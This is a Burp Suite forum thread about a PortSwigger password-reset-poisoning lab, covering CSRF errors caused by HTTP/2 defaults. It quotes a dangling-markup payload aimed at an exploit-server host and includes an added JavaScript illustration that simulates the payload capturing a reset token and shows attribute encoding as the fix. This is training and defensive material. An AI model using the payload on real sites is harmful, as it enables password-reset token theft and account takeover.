The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Password reset poisoning via dangling markup

Dark | Last updated: Jun 05, 2021 12:43PM UTC

In step 5 it keeps telling me that the CSRF token is invalid. Even when I follow the video tutorial the result is the same, so please help me solve the lab.

Uthman, PortSwigger Agent | Last updated: Jun 07, 2021 10:12AM UTC

Thanks for reporting this. We have checked the lab and it appears to be functioning without any issues. Can you double-check that you are sending the correct request to Repeater? If you believe there could be a bug, please email support@portswigger.net with a screen recording of your attempt.

Nstderr | Last updated: Apr 09, 2023 09:28PM UTC

I'm not sure how you determined it functions without issues, since the issue is with Burp and its default settings. For anyone else that's having this "Parameter missing: 'csrf'" issue, it's due to Burp automatically changing the protocol to HTTP/2. If this is disabled in settings (Network > Settings > HTTP > uncheck "Default to HTTP/2 if the server supports it"), the csrf error is fixed.

Ben, PortSwigger Agent | Last updated: Apr 10, 2023 08:41AM UTC

Hi, just to clarify, the initial response to this forum thread was made nearly two years ago, prior to the labs supporting HTTP/2. In terms of the current issues with the lab, we are in the process of updating our instructions, where necessary, in order for them to still be relevant now that the labs do support HTTP/2. This looks like it is a lab that we need to address, so we will discuss this with the wider team.

werthergotguns | Last updated: Sep 07, 2023 02:06PM UTC

There is a bug in the lab; you can solve it by enforcing the use of the HTTP/1.1 protocol in the proxy before passing the request to Repeater. Also, the payload in the lab solution doesn't work. This is the correct one: :'><a href="//exploit-TOKEN.exploit-server.net/?
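For readers wondering why the payload in the post above leaks the reset token at all, the following is an added illustration, not code from the PortSwigger lab, Burp, or any poster in this thread. It models a reset page in which an attacker-influenced host lands inside a single-quoted href, the reset token appears later in the markup, and a double-quoted attribute follows it; the page layout, the hostnames, and the `token` parameter name are all assumptions. The payload closes the original single-quoted attribute, opens a new anchor whose double-quoted href is never terminated, and so the browser treats everything up to the next `"` (token included) as the URL it will request from the exploit server. The same block shows the attribute encoding that stops the breakout.

```javascript
// Added illustration (not PortSwigger lab or Burp code): why the dangling-markup
// payload quoted above leaks the reset token, and the attribute encoding that
// stops it. The page layout, hostnames and parameter names are assumptions.

const EXPLOIT_HOST = "exploit-TOKEN.exploit-server.net"; // assumed exploit server
const PAYLOAD = `:'><a href="//${EXPLOIT_HOST}/?`;       // payload from the thread

// Minimal HTML attribute encoder. Once applied, the payload's quote can never
// terminate the attribute it was placed in, so no new anchor forms.
function escapeAttr(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Assumed reset page: the attacker-influenced host sits in a single-quoted
// href, the reset token appears later, and a double-quoted attribute follows.
// `encode` selects the hardened rendering.
function renderResetPage(hostValue, token, encode) {
  const host = encode ? escapeAttr(hostValue) : hostValue;
  return [
    `<a href='https://${host}/login'>Log in</a>`,
    `<p>Reset your password: <a href='https://example.com/reset?token=${token}'>here</a></p>`,
    `<img src="/static/logo.png" alt="logo">`,
  ].join("\n");
}

// Models the HTML tokenizer rule that matters here: a double-quoted attribute
// value runs until the next '"', whatever markup lies in between. Returns the
// URL the injected anchor points at (what the exploit server would receive),
// or null if the injected anchor never forms.
function danglingHrefTarget(html) {
  const start = html.indexOf(`<a href="//${EXPLOIT_HOST}/?`);
  if (start === -1) return null;
  const valueStart = start + `<a href="`.length;
  const end = html.indexOf('"', valueStart);
  return end === -1 ? null : html.slice(valueStart, end);
}

// What the attacker would pull out of the exploit server's access log.
function tokenFromTarget(target) {
  const m = target && /token=([A-Za-z0-9]+)/.exec(target);
  return m ? m[1] : null;
}

// End-to-end: render the page with the payload appended to a legitimate-looking
// host, then recover whatever token the dangling href swallowed.
function leakedToken(encode) {
  const html = renderResetPage("victim-site.example" + PAYLOAD, "abc123", encode);
  return tokenFromTarget(danglingHrefTarget(html));
}

console.log("vulnerable rendering leaks:", leakedToken(false)); // "abc123"
console.log("hardened rendering leaks:  ", leakedToken(true));  // null
```

The capture ends at the first `"` after the injected anchor, so the technique only works when the secret sits between the injection point and the next double quote; that is why the choice of quote character in the payload (single to close, double to open) has to match the quoting the page actually uses.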

Ben, PortSwigger Agent | Last updated: Sep 07, 2023 05:06PM UTC